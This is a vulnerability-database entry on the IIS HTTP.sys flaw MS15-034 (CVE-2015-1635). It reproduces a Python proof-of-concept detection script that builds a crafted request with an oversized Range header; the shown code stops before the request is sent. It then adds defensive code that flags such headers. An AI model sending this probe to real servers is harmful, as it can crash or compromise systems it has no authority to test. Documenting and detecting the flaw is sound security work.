MS15-034 IIS 7.0 HTTP.sys remote code execution vulnerability (CVE-2015-1635) POC - vulnerability warning - the black bar safety net

2016-10-17T00:00:00
ID MYHACK58:62201680262
Type myhack58
Reporter Anonymous
Modified 2016-10-17T00:00:00

Description

Detection script (Python, Beebeeto): http://www.beebeeto.com/pdb/poc-2015-0081/

#!/usr/bin/env python
# coding=utf-8

"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""

import socket
import random
import urlparse

from baseframe import BaseFrame


class MyPoc(BaseFrame):
    poc_info = {
        # poc related information
        'poc': {
            'id': 'poc-2015-0081',
            'name': 'IIS 7.0 HTTP.sys remote code execution vulnerability (CVE-2015-1635) POC',
            'author': 'user1018',
            'create_date': '2015-04-15',
        },
        # Protocol-related information
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer4_protocol': ['tcp'],
        },
        # Vulnerability related information
        'vul': {
            'app_name': 'IIS',
            'vul_version': ['7.0'],
            'type': 'Code Execution',
            'tag': ['IIS 7.0 vulnerability', 'HTTP.sys exploits', 'CVE-2015-1635'],
            'desc': '''
                    Scope of impact:
                    Windows 7
                    Windows 8
                    Windows Server 2008
                    Windows Server 2012
                    A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys),
                    caused when HTTP.sys improperly parses specially crafted HTTP requests.
                    An attacker who successfully exploits this vulnerability can execute arbitrary
                    code in the context of the System account.
                    To exploit this vulnerability, an attacker must send a specially crafted HTTP
                    request to an affected system. Installing the update fixes the vulnerability by
                    modifying how the Windows HTTP stack processes requests.
                    ''',
            'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',
                           'http://bobao.360.cn/news/detail/1435.html'],
        },
    }

    @classmethod
    def verify(cls, args):
        target = args['options']['target']
        # A target given without a scheme parses with an empty netloc,
        # so the host is taken from the path component instead.
        if urlparse.urlparse(target).netloc == "":
            ipAddr = urlparse.urlparse(target).path
        else:
            ipAddr = socket.gethostbyname(urlparse.urlparse(target).netloc)
        # Decimal form of 2**64 - 1, used as the upper bound of the Range header
        hexAllFfff = "18446744073709551615"
        req1 = "GET / HTTP/1.0\r\n\r\n"
        req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
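The detection script above sends a Range header whose upper bound is 18446744073709551615. As an added example (Python 3, not part of the original page or the Beebeeto project), the code below shows the defender's side of that check: it parses a raw HTTP request and flags any byte-range position at or above that value. The function names, the threshold constant and the sample requests are constructed for illustration, and handling of multiple ranges and lower-case header names goes beyond the single request shown on the page.

```python
# Added example: flag HTTP requests carrying the oversized Range header
# that the detection script above sends. Names and samples are constructed.
import re

UINT64_MAX = 2**64 - 1  # 18446744073709551615, the bound used by the script

_RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def parse_headers(raw_request: bytes) -> dict:
    """Return request headers as a lower-cased name -> value dict."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def suspicious_range(raw_request: bytes) -> bool:
    """True if any byte-range position reaches or exceeds 2**64 - 1."""
    value = parse_headers(raw_request).get("range", "")
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return False
    for spec in specs.split(","):
        m = _RANGE_SPEC.match(spec)
        if not m:
            continue  # malformed spec: nothing numeric to compare
        for pos in m.groups():
            if pos and int(pos) >= UINT64_MAX:
                return True
    return False


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "probe": b"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
    "multi": b"GET /a.png HTTP/1.1\r\nHost: x\r\nrange: bytes=0-10, 0-18446744073709551615\r\n\r\n",
    "normal": b"GET /a.png HTTP/1.1\r\nHost: x\r\nRange: bytes=0-1023\r\n\r\n",
    "no_range": b"GET / HTTP/1.0\r\n\r\n",
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(name, suspicious_range(req))
```

The same comparison can be applied to the Range field of web server or proxy logs where that header is recorded.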
